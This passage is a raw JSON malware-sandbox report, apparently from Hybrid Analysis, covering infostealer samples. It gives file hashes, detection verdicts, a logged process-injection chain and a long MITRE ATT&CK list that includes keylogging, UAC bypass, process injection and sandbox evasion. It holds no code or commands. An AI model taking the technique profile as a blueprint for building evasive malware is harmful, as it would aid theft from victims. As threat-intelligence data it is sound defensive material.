"https://attack.mitre.org/techniques/T1057"}, {"threat_level": 2, "threat_level_human": "malicious", "category": "Installation/Persistence", "identifier": "api-0", "type": 6, "relevance": 6, "name": "Writes data to a remote process", "description": "\"7481bbedbc273334586530c04b45fa23db4a5f57e91c31decbd96f94ec48e26c.exe\" wrote 32 bytes to a remote process \"C:\\4822004.exe\" (Handle: 120)\n \"7481bbedbc273334586530c04b45fa23db4a5f57e91c31decbd96f94ec48e26c.exe\" wrote 52 bytes to a remote process \"C:\\4822004.exe\" (Handle: 120)\n \"7481bbedbc273334586530c04b45fa23db4a5f57e91c31decbd96f94ec48e26c.exe\" wrote 4 bytes to a remote process \"C:\\4822004.exe\" (Handle: 120)\n \"4822004.exe\" wrote 32 bytes to a remote process \"C:\\26224.exe\" (Handle: 68)\n \"4822004.exe\" wrote 52 bytes to a remote process \"C:\\26224.exe\" (Handle: 68)\n \"4822004.exe\" wrote 4 bytes to a remote process \"C:\\26224.exe\" (Handle: 68)\n \"26224.exe\" wrote 32 bytes to a remote process \"C:\\226242.exe\" (Handle: 68)\n \"26224.exe\" wrote 52 bytes to a remote process \"C:\\226242.exe\" (Handle: 68)\n \"26224.exe\" wrote 4 bytes to a remote process \"C:\\226242.exe\" (Handle: 68)\n \"226242.exe\" wrote 32 bytes to a remote process \"C:\\8402624.exe\" (Handle: 68)\n \"226242.exe\" wrote 52 bytes to a remote process \"C:\\8402624.exe\" (Handle: 68)\n \"226242.exe\" wrote 4 bytes to a remote process \"C:\\8402624.exe\" (Handle: 68)\n \"8402624.exe\" wrote 32 bytes to a remote process \"C:\\484648.exe\" (Handle: 116)\n \"8402624.exe\" wrote 52 bytes to a remote process \"C:\\484648.exe\" (Handle: 116)\n \"8402624.exe\" wrote 4 bytes to a remote process \"C:\\484648.exe\" (Handle: 116)\n \"484648.exe\" wrote 32 bytes to a remote process \"C:\\4262848.exe\" (Handle: 68)\n \"484648.exe\" wrote 52 bytes to a remote process \"C:\\4262848.exe\" (Handle: 68)\n \"484648.exe\" wrote 4 bytes to a remote process \"C:\\4262848.exe\" (Handle: 68)\n \"4262848.exe\" wrote 32 bytes to a remote process \"C:\\20484.exe\" (Handle: 116)\n \"4262848.exe\" wrote 52 bytes to a remote process \"C:\\20484.exe\" (Handle: 116)\n \"4262848.exe\" wrote 4 bytes to a remote process \"C:\\20484.exe\" (Handle: 116)\n \"20484.exe\" wrote 32 bytes to a remote process \"C:\\806288.exe\" (Handle: 68)\n \"20484.exe\" wrote 52 bytes to a remote process \"C:\\806288.exe\" (Handle: 68)\n \"20484.exe\" wrote 4 bytes to a remote process \"C:\\806288.exe\" (Handle: 68)\n \"806288.exe\" wrote 32 bytes to a remote process \"C:\\hrrrr.exe\" (Handle: 80)\n \"806288.exe\" wrote 52 bytes to a remote process \"C:\\hrrrr.exe\" (Handle: 80)\n \"806288.exe\" wrote 4 bytes to a remote process \"C:\\hrrrr.exe\" (Handle: 80)\n \"hrrrr.exe\" wrote 32 bytes to a remote process \"C:\\vvvtjhp.exe\" (Handle: 68)\n \"hrrrr.exe\" wrote 52 bytes to a remote process \"C:\\vvvtjhp.exe\" (Handle: 68)\n \"hrrrr.exe\" wrote 4 bytes to a remote process \"C:\\vvvtjhp.exe\" (Handle: 68)\n \"vvvtjhp.exe\" wrote 32 bytes to a remote process \"C:\\fvbll.exe\" (Handle: 68)\n \"vvvtjhp.exe\" wrote 52 bytes to a remote process \"C:\\fvbll.exe\" (Handle: 68)\n \"vvvtjhp.exe\" wrote 4 bytes to a remote process \"C:\\fvbll.exe\" (Handle: 68)\n \"fvbll.exe\" wrote 32 bytes to a remote process \"C:\\lpljbv.exe\" (Handle: 116)\n \"fvbll.exe\" wrote 52 bytes to a remote process \"C:\\lpljbv.exe\" (Handle: 116)\n \"fvbll.exe\" wrote 4 bytes to a remote process \"C:\\lpljbv.exe\" (Handle: 116)\n \"lpljbv.exe\" wrote 32 bytes to a remote process \"C:\\rjldjr.exe\" (Handle: 68)\n \"lpljbv.exe\" wrote 52 bytes to a remote process \"C:\\rjldjr.exe\" (Handle: 68)\n \"lpljbv.exe\" wrote 4 bytes to a remote process \"C:\\rjldjr.exe\" (Handle: 68)\n \"rjldjr.exe\" wrote 32 bytes to a remote process \"C:\\ljlpvrx.exe\" (Handle: 116)\n \"rjldjr.exe\" wrote 52 bytes to a remote process \"C:\\ljlpvrx.exe\" (Handle: 116)\n \"rjldjr.exe\" wrote 4 bytes to a remote process \"C:\\ljlpvrx.exe\" (Handle: 116)\n \"ljlpvrx.exe\" wrote 32 bytes to a remote process \"C:\\bfbfxx.exe\" (Handle: 68)\n \"ljlpvrx.exe\" wrote 52 bytes to a remote process \"C:\\bfbfxx.exe\" (Handle: 68)\n \"ljlpvrx.exe\" wrote 4 bytes to a remote process \"C:\\bfbfxx.exe\" (Handle: 68)\n \"bfbfxx.exe\" wrote 32 bytes to a remote process \"C:\\2046660.exe\" (Handle: 120)\n \"bfbfxx.exe\" wrote 52 bytes to a remote process \"C:\\2046660.exe\" (Handle: 120)\n \"bfbfxx.exe\" wrote 4 bytes to a remote process \"C:\\2046660.exe\" (Handle: 120)\n \"2046660.exe\" wrote 32 bytes to a remote process \"C:\\40484.exe\" (Handle: 68)\n \"2046660.exe\" wrote 52 bytes to a remote process \"C:\\40484.exe\" (Handle: 68)", "origin": "API Call", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}, {"threat_level": 2, "threat_level_human": "malicious", "category": "External Systems", "identifier": "avtest-8", "type": 12, "relevance": 10, "name": "Sample detected by CrowdStrike Static Analysis and ML with relatively high confidence", "description": "CrowdStrike Static Analysis and ML (QuickScan) yielded detection: win/malicious_confidence_100% (W)", "origin": "External System"}]}
531d6bd6c0207ffc145c714da946bae8a057be3a3fc7001f5ea800ef8c61679c
https://hybrid-analysis.com/sample/531d6bd6c0207ffc145c714da946bae8a057be3a3fc7001f5ea800ef8c61679c
Hybrid Analysis - Infostealers
{"size": 97606, "type": "PE32 executable (GUI) Intel 80386, for MS Windows", "submit_name": "531d6bd6c0207ffc145c714da946bae8a057be3a3fc7001f5ea800ef8c61679c", "sha256": "531d6bd6c0207ffc145c714da946bae8a057be3a3fc7001f5ea800ef8c61679c", "av_detect": 91, "vx_family": "Dump:Generic.Dacic.9C483F5C.A", "threat_score": 100, "threat_level": 2, "verdict": "malicious", "certificates_validation_message": "No signature was present in the subject. (0x800b0100)", "total_network_connections": 1, "total_processes": 3, "total_signatures": 186, "extracted_files": [{"name": "rundll32.exe", "file_path": "%WINDIR%\\system\\rundll32.exe", "file_size": 90681, "sha256": "b13a9ece87770e889d6864878d4d0cdc85d8910528474f7b963900b236f40f50", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386, for MS Windows", "runtime_process": "rundll32.exe (PID: 5856)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "_.exe", "file_size": 91352, "sha256": "85674e33b8aa8470c43d1cf544d33776748d918a833845f6e2d36b0470bb4517", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386, for MS Windows", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "notepad_.exe", "file_size": 87884, "sha256": "370c31f2b1d54ea0f79c697ce226168b51b3e9a16f9ed25178fb1c97f5a46a4b", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386, for MS Windows", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "RUNDLL32.EXE.67A47CBF.bin", "file_size": 90681, "sha256": "b13a9ece87770e889d6864878d4d0cdc85d8910528474f7b963900b236f40f50", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386, for MS Windows", "threat_level_readable": "no specific threat", "file_available_to_download": true}], "file_metadata": {"file_compositions": ["1 .RES Files linked with CVTRES.EXE 5.00 (Visual Studio 5) (build: 1720)", "17 .CPP Files compiled with CL.EXE 12.00 (Visual Studio 6) (build: 8168)"], "imported_objects": ["5 .OBJ Files (COFF) linked with LINK.EXE 6.00 (Visual Studio 6) (build: 8168)", "11 .C Files compiled with CL.EXE 12.00 (Visual Studio 6) (build: 8168)", "2 .ASM Files assembled with MASM 6.13 (Visual Studio 6 SP1) (build: 7299)", "12 .OBJ Files (COFF) linked with LINK.EXE 5.12 (Visual Studio 5 SP2) (build: 8034)", "4 .OBJ Files linked with ALIASOBJ.EXE 6.00 (Internal OLDNAMES.LIB Tool) (build: 7291)"], "file_analysis": ["File contains C++ code", "File is the product of a medium codebase (17 files)"], "total_file_compositions_imports": 239}, "processes": [{"uid": "00000000-00005736", "name": "531d6bd6c0207ffc145c714da946bae8a057be3a3fc7001f5ea800ef8c61679c.exe", "normalized_path": "C:\\531d6bd6c0207ffc145c714da946bae8a057be3a3fc7001f5ea800ef8c61679c.exe", "sha256": "531d6bd6c0207ffc145c714da946bae8a057be3a3fc7001f5ea800ef8c61679c"}, {"uid": "00000000-00005856", "parentuid": "00000000-00005736", "name": "rundll32.exe", "normalized_path": "%WINDIR%\\system\\rundll32.exe", "sha256": "b13a9ece87770e889d6864878d4d0cdc85d8910528474f7b963900b236f40f50"}, {"uid": "00000000-00006120", "name": "WerFault.exe", "normalized_path": "%WINDIR%\\system32\\WerFault.exe", "command_line": "-u -p 5856 -s 192", "sha256": "08bace187a0225e10677de9aa6738a7118be3e5cad6dc45fb8d3366a61bb343c"}], "mitre_attcks": [{"tactic": "Execution", "technique": "Native API", "attck_id": "T1106", "attck_id_wiki": "https://attack.mitre.org/techniques/T1106", "malicious_identifiers_count": 1, "suspicious_identifiers_count": 4, "informative_identifiers_count": 13}, {"tactic": "Execution", "technique": "Windows Command Shell", "attck_id": "T1059.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1059/003", "informative_identifiers_count": 1, "parent": {"technique": "Command and Scripting Interpreter", "attck_id": "T1059", "attck_id_wiki": "https://attack.mitre.org/techniques/T1059"}}, {"tactic": "Execution", "technique": "Shared Modules", "attck_id": "T1129", "attck_id_wiki": "https://attack.mitre.org/techniques/T1129", "informative_identifiers_count": 4}, {"tactic": "Execution", "technique": "Inter-Process Communication", "attck_id": "T1559", "attck_id_wiki": "https://attack.mitre.org/techniques/T1559", "informative_identifiers_count": 1}, {"tactic": "Persistence", "technique": "Windows Service", "attck_id": "T1543.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1543/003", "informative_identifiers_count": 2, "parent": {"technique": "Create or Modify System Process", "attck_id": "T1543", "attck_id_wiki": "https://attack.mitre.org/techniques/T1543"}}, {"tactic": "Persistence", "technique": "Create or Modify System Process", "attck_id": "T1543", "attck_id_wiki": "https://attack.mitre.org/techniques/T1543", "suspicious_identifiers_count": 1, "informative_identifiers_count": 1}, {"tactic": "Persistence", "technique": "Component Object Model Hijacking", "attck_id": "T1546.015", "attck_id_wiki": "https://attack.mitre.org/techniques/T1546/015", "informative_identifiers_count": 2, "parent": {"technique": "Event Triggered Execution", "attck_id": "T1546", "attck_id_wiki": "https://attack.mitre.org/techniques/T1546"}}, {"tactic": "Persistence", "technique": "Boot or Logon Autostart Execution", "attck_id": "T1547", "attck_id_wiki": "https://attack.mitre.org/techniques/T1547", "suspicious_identifiers_count": 2}, {"tactic": "Persistence", "technique": "DLL Side-Loading", "attck_id": "T1574.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574/002", "informative_identifiers_count": 1, "parent": {"technique": "Hijack Execution Flow", "attck_id": "T1574", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574"}}, {"tactic": "Privilege Escalation", "technique": "Dynamic-link Library Injection", "attck_id": "T1055.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/001", "informative_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Privilege Escalation", "technique": "Windows Service", "attck_id": "T1543.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1543/003", "informative_identifiers_count": 2, "parent": {"technique": "Create or Modify System Process", "attck_id": "T1543", "attck_id_wiki": "https://attack.mitre.org/techniques/T1543"}}, {"tactic": "Privilege Escalation", "technique": "Create or Modify System Process", "attck_id": "T1543", "attck_id_wiki": "https://attack.mitre.org/techniques/T1543", "suspicious_identifiers_count": 1, "informative_identifiers_count": 1}, {"tactic": "Privilege Escalation", "technique": "Component Object Model Hijacking", "attck_id": "T1546.015", "attck_id_wiki": "https://attack.mitre.org/techniques/T1546/015", "informative_identifiers_count": 2, "parent": {"technique": "Event Triggered Execution", "attck_id": "T1546", "attck_id_wiki": "https://attack.mitre.org/techniques/T1546"}}, {"tactic": "Privilege Escalation", "technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055", "malicious_identifiers_count": 3, "suspicious_identifiers_count": 1}, {"tactic": "Privilege Escalation", "technique": "ListPlanting", "attck_id": "T1055.015", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/015", "informative_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Privilege Escalation", "technique": "Bypass User Account Control", "attck_id": "T1548.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1548/002", "informative_identifiers_count": 1, "parent": {"technique": "Abuse Elevation Control Mechanism", "attck_id": "T1548", "attck_id_wiki": "https://attack.mitre.org/techniques/T1548"}}, {"tactic": "Privilege Escalation", "technique": "Thread Execution Hijacking", "attck_id": "T1055.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/003", "informative_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Privilege Escalation", "technique": "Boot or Logon Autostart Execution", "attck_id": "T1547", "attck_id_wiki": "https://attack.mitre.org/techniques/T1547", "suspicious_identifiers_count": 2}, {"tactic": "Privilege Escalation", "technique": "Extra Window Memory Injection", "attck_id": "T1055.011", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/011", "suspicious_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Privilege Escalation", "technique": "DLL Side-Loading", "attck_id": "T1574.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574/002", "informative_identifiers_count": 1, "parent": {"technique": "Hijack Execution Flow", "attck_id": "T1574", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574"}}, {"tactic": "Defense Evasion", "technique": "Modify Registry", "attck_id": "T1112", "attck_id_wiki": "https://attack.mitre.org/techniques/T1112", "suspicious_identifiers_count": 3, "informative_identifiers_count": 4}, {"tactic": "Defense Evasion", "technique": "Timestomp", "attck_id": "T1070.006", "attck_id_wiki": "https://attack.mitre.org/techniques/T1070/006", "suspicious_identifiers_count": 2, "informative_identifiers_count": 2, "parent": {"technique": "Indicator Removal", "attck_id": "T1070", "attck_id_wiki": "https://attack.mitre.org/techniques/T1070"}}, {"tactic": "Defense Evasion", "technique": "Dynamic-link Library Injection", "attck_id": "T1055.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/001", "informative_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Defense Evasion", "technique": "Debugger Evasion", "attck_id": "T1622", "attck_id_wiki": "https://attack.mitre.org/techniques/T1622", "suspicious_identifiers_count": 1, "informative_identifiers_count": 1}, {"tactic": "Defense Evasion", "technique": "File and Directory Permissions Modification", "attck_id": "T1222", "attck_id_wiki": "https://attack.mitre.org/techniques/T1222", "informative_identifiers_count": 1}, {"tactic": "Defense Evasion", "technique": "Obfuscated Files or Information", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027", "suspicious_identifiers_count": 1, "informative_identifiers_count": 3}, {"tactic": "Defense Evasion", "technique": "Time Based Evasion", "attck_id": "T1497.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497/003", "informative_identifiers_count": 3, "parent": {"technique": "Virtualization/Sandbox Evasion", "attck_id": "T1497", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497"}}, {"tactic": "Defense Evasion", "technique": "File Deletion", "attck_id": "T1070.004", "attck_id_wiki": "https://attack.mitre.org/techniques/T1070/004", "suspicious_identifiers_count": 1, "informative_identifiers_count": 1, "parent": {"technique": "Indicator Removal", "attck_id": "T1070", "attck_id_wiki": "https://attack.mitre.org/techniques/T1070"}}, {"tactic": "Defense Evasion", "technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055", "malicious_identifiers_count": 3, "suspicious_identifiers_count": 1}, {"tactic": "Defense Evasion", "technique": "User Activity Based Checks", "attck_id": "T1497.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497/002", "informative_identifiers_count": 1, "parent": {"technique": "Virtualization/Sandbox Evasion", "attck_id": "T1497", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497"}}, {"tactic": "Defense Evasion", "technique": "ListPlanting", "attck_id": "T1055.015", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/015", "informative_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Defense Evasion", "technique": "Hidden Window", "attck_id": "T1564.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1564/003", "informative_identifiers_count": 1, "parent": {"technique": "Hide Artifacts", "attck_id": "T1564", "attck_id_wiki": "https://attack.mitre.org/techniques/T1564"}}, {"tactic": "Defense Evasion", "technique": "Bypass User Account Control", "attck_id": "T1548.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1548/002", "informative_identifiers_count": 1, "parent": {"technique": "Abuse Elevation Control Mechanism", "attck_id": "T1548", "attck_id_wiki": "https://attack.mitre.org/techniques/T1548"}}, {"tactic": "Defense Evasion", "technique": "Thread Execution Hijacking", "attck_id": "T1055.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/003", "informative_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Defense Evasion", "technique": "Extra Window Memory Injection", "attck_id": "T1055.011", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/011", "suspicious_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Defense Evasion", "technique": "Software Packing", "attck_id": "T1027.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027/002", "suspicious_identifiers_count": 1, "informative_identifiers_count": 1, "parent": {"technique": "Obfuscated Files or Information", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027"}}, {"tactic": "Defense Evasion", "technique": "Clear Persistence", "attck_id": "T1070.009", "attck_id_wiki": "https://attack.mitre.org/techniques/T1070/009", "suspicious_identifiers_count": 1, "parent": {"technique": "Indicator Removal", "attck_id": "T1070", "attck_id_wiki": "https://attack.mitre.org/techniques/T1070"}}, {"tactic": "Defense Evasion", "technique": "Indicator Removal", "attck_id": "T1070", "attck_id_wiki": "https://attack.mitre.org/techniques/T1070", "suspicious_identifiers_count": 1}, {"tactic": "Defense Evasion", "technique": "Disable or Modify Tools", "attck_id": "T1562.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1562/001", "informative_identifiers_count": 1, "parent": {"technique": "Impair Defenses", "attck_id": "T1562", "attck_id_wiki": "https://attack.mitre.org/techniques/T1562"}}, {"tactic": "Defense Evasion", "technique": "Odbcconf", "attck_id": "T1218.008", "attck_id_wiki": "https://attack.mitre.org/techniques/T1218/008", "malicious_identifiers_count": 1, "parent": {"technique": "System Binary Proxy Execution", "attck_id": "T1218", "attck_id_wiki": "https://attack.mitre.org/techniques/T1218"}}, {"tactic": "Defense Evasion", "technique": "Masquerading", "attck_id": "T1036", "attck_id_wiki": "https://attack.mitre.org/techniques/T1036", "malicious_identifiers_count": 1}, {"tactic": "Defense Evasion", "technique": "Masquerade File Type", "attck_id": "T1036.008", "attck_id_wiki": "https://attack.mitre.org/techniques/T1036/008", "suspicious_identifiers_count": 1, "parent": {"technique": "Masquerading", "attck_id": "T1036", "attck_id_wiki": "https://attack.mitre.org/techniques/T1036"}}, {"tactic": "Defense Evasion", "technique": "DLL Side-Loading", "attck_id": "T1574.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574/002", "informative_identifiers_count": 1, "parent": {"technique": "Hijack Execution Flow", "attck_id": "T1574", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574"}}, {"tactic": "Defense Evasion", "technique": "Dynamic API Resolution", "attck_id": "T1027.007", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027/007", "informative_identifiers_count": 1, "parent": {"technique": "Obfuscated Files or Information", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027"}}, {"tactic": "Defense Evasion", "technique": "Indicator Removal from Tools", "attck_id": "T1027.005", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027/005", "informative_identifiers_count": 1, "parent": {"technique": "Obfuscated Files or Information", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027"}}, {"tactic": "Defense Evasion", "technique": "Deobfuscate/Decode Files or Information", "attck_id": "T1140", "attck_id_wiki": "https://attack.mitre.org/techniques/T1140", "informative_identifiers_count": 1}, {"tactic": "Defense Evasion", "technique": "Execution Guardrails", "attck_id": "T1480", "attck_id_wiki": "https://attack.mitre.org/techniques/T1480", "informative_identifiers_count": 1}, {"tactic": "Credential Access", "technique": "Keylogging", "attck_id": "T1056.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1056/001", "informative_identifiers_count": 1, "parent": {"technique": "Input Capture", "attck_id": "T1056", "attck_id_wiki": "https://attack.mitre.org/techniques/T1056"}}, {"tactic": "Discovery", "technique": "File and Directory Discovery", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083", "informative_identifiers_count": 9}, {"tactic": "Discovery", "technique": "Debugger Evasion", "attck_id": "T1622", "attck_id_wiki": "https://attack.mitre.org/techniques/T1622", "suspicious_identifiers_count": 1, "informative_identifiers_count": 1}, {"tactic": "Discovery", "technique": "System Information Discovery", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082", "suspicious_identifiers_count": 1, "informative_identifiers_count": 12}, {"tactic": "Discovery", "technique": "Application Window Discovery", "attck_id": "T1010", "attck_id_wiki": "https://attack.mitre.org/techniques/T1010", "suspicious_identifiers_count": 1, "informative_identifiers_count": 5}, {"tactic": "Discovery", "technique": "Query Registry", "attck_id": "T1012", "attck_id_wiki": "https://attack.mitre.org/techniques/T1012", "suspicious_identifiers_count": 4, "informative_identifiers_count": 5}, {"tactic": "Discovery", "technique": "Time Based Evasion", "attck_id": "T1497.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497/003", "informative_identifiers_count": 3, "parent": {"technique": "Virtualization/Sandbox Evasion", "attck_id": "T1497", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497"}}, {"tactic": "Discovery", "technique": "Process Discovery", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057", "suspicious_identifiers_count": 3, "informative_identifiers_count": 8}, {"tactic": "Discovery", "technique": "User Activity Based Checks", "attck_id": "T1497.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497/002", "informative_identifiers_count": 1, "parent": {"technique": "Virtualization/Sandbox Evasion", "attck_id": "T1497", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497"}}, {"tactic": "Discovery", "technique": "System Location Discovery", "attck_id": "T1614", "attck_id_wiki": "https://attack.mitre.org/techniques/T1614", "informative_identifiers_count": 1}, {"tactic": "Discovery", "technique": "Security Software Discovery", "attck_id": "T1518.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1518/001", "malicious_identifiers_count": 1, "parent": {"technique": "Software Discovery", "attck_id": "T1518", "attck_id_wiki": "https://attack.mitre.org/techniques/T1518"}}, {"tactic": "Discovery", "technique": "System Language Discovery", "attck_id": "T1614.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1614/001", "informative_identifiers_count": 1, "parent": {"technique": "System Location Discovery", "attck_id": "T1614", "attck_id_wiki": "https://attack.mitre.org/techniques/T1614"}}, {"tactic": "Discovery", "technique": "System Service Discovery", "attck_id": "T1007", "attck_id_wiki": "https://attack.mitre.org/techniques/T1007", "informative_identifiers_count": 1}, {"tactic": "Discovery", "technique": "System Owner/User Discovery", "attck_id": "T1033", "attck_id_wiki": "https://attack.mitre.org/techniques/T1033", "informative_identifiers_count": 1}, {"tactic": "Lateral Movement", "technique": "Remote Services", "attck_id": "T1021", "attck_id_wiki": "https://attack.mitre.org/techniques/T1021", "informative_identifiers_count": 1}, {"tactic": "Collection", "technique": "Local Data Staging", "attck_id": "T1074.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1074/001", "informative_identifiers_count": 2, "parent": {"technique": "Data Staged", "attck_id": "T1074", "attck_id_wiki": "https://attack.mitre.org/techniques/T1074"}}, {"tactic": "Collection", "technique": "Screen Capture", "attck_id": "T1113", "attck_id_wiki": "https://attack.mitre.org/techniques/T1113", "informative_identifiers_count": 2}, {"tactic": "Collection", "technique": "Email Collection", "attck_id": "T1114", "attck_id_wiki": "https://attack.mitre.org/techniques/T1114", "suspicious_identifiers_count": 1}, {"tactic": "Collection", "technique": "Keylogging", "attck_id": "T1056.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1056/001", "informative_identifiers_count": 1, "parent": {"technique": "Input Capture", "attck_id": "T1056", "attck_id_wiki": "https://attack.mitre.org/techniques/T1056"}}, {"tactic": "Command and Control", "technique": "Application Layer Protocol", "attck_id": "T1071", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071", "suspicious_identifiers_count": 2, "informative_identifiers_count": 9}, {"tactic": "Command and Control", "technique": "Non-Application Layer Protocol", "attck_id": "T1095", "attck_id_wiki": "https://attack.mitre.org/techniques/T1095", "informative_identifiers_count": 1}, {"tactic": "Command and Control", "technique": "Proxy", "attck_id": "T1090", "attck_id_wiki": "https://attack.mitre.org/techniques/T1090", "informative_identifiers_count": 1}, {"tactic": "Command and Control", "technique": "Web Protocols", "attck_id": "T1071.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071/001", "suspicious_identifiers_count": 3, "informative_identifiers_count": 6, "parent": {"technique": "Application Layer Protocol", "attck_id": "T1071", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071"}}, {"tactic": "Command and Control", "technique": "Non-Standard Port", "attck_id": "T1571", "attck_id_wiki": "https://attack.mitre.org/techniques/T1571", "informative_identifiers_count": 1}, {"tactic": "Command and Control", "technique": "Data Encoding", "attck_id": "T1132", "attck_id_wiki": "https://attack.mitre.org/techniques/T1132", "informative_identifiers_count": 2}, {"tactic": "Command and Control", "technique": "Ingress Tool Transfer", "attck_id": "T1105", "attck_id_wiki": "https://attack.mitre.org/techniques/T1105", "suspicious_identifiers_count": 2, "informative_identifiers_count": 2}, {"tactic": "Command and Control", "technique": "Mail Protocols", "attck_id": "T1071.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071/003", "informative_identifiers_count": 1, "parent": {"technique": "Application Layer Protocol", "attck_id": "T1071", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071"}}, {"tactic": "Command and Control", "technique": "DNS", "attck_id": "T1071.004", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071/004", "informative_identifiers_count": 1, "parent": {"technique": "Application Layer Protocol", "attck_id": "T1071", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071"}}, {"tactic": "Command and Control", "technique": "Symmetric Cryptography", "attck_id": "T1573.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1573/001", "informative_identifiers_count": 1, "parent": {"technique": "Encrypted Channel", "attck_id": "T1573", "attck_id_wiki": "https://attack.mitre.org/techniques/T1573"}}, {"tactic": "Impact", "technique": "Service Stop", "attck_id": "T1489", "attck_id_wiki": "https://attack.mitre.org/techniques/T1489", "suspicious_identifiers_count": 1, "informative_identifiers_count": 1}], "network_mode": "default", "signatures": [{"threat_level_human": "informative", "category": "General", "identifier": "string-345", "type": 2, "relevance": 1, "name": "Contains ability to disable/close registry key (API string)", "description": "Found reference to API \"RegCloseKey\" (Indicator: \"RegCloseKey\"; File: \"531d6bd6c0207ffc145c714da946bae8a057be3a3fc7001f5ea800ef8c61679c\")\n Found reference to API \"RegCloseKey\" (Indicator: \"RegCloseKey\"; Source: \"00000000-00005736.00000001.66440.0040C000.00000080.mdmp\")", "origin": "File/Memory", "attck_id": "T1112", "attck_id_wiki": "https://attack.mitre.org/techniques/T1112"}, {"threat_level_human": "informative", "category": "General", "identifier": "string-240", "type": 2, "relevance": 1, "name": "Contains ability to execute an application (API string)", "description": "Found reference to API \"WinExec\" (Indicator: \"WinExec\"; File: \"531d6bd6c0207ffc145c714da946bae8a057be3a3fc7001f5ea800ef8c61679c\")\n Found reference to API \"ShellExecuteA\" (Indicator: \"ShellExecute\"; File: \"531d6bd6c0207ffc145c714da946bae8a057be3a3fc7001f5ea800ef8c61679c\")\n Found reference to API \"WinExec\" (Indicator: \"WinExec\"; Source: \"00000000-00005736.00000001.66440.0040C000.00000080.mdmp\")\n Found reference to API \"ShellExecuteA\" (Indicator: \"ShellExecute\"; Source: \"00000000-00005736.00000001.66440.0040C000.00000080.mdmp\")", "origin": "File/Memory", "attck_id": "T1106", "attck_id_wiki": "https://attack.mitre.org/techniques/T1106"}, 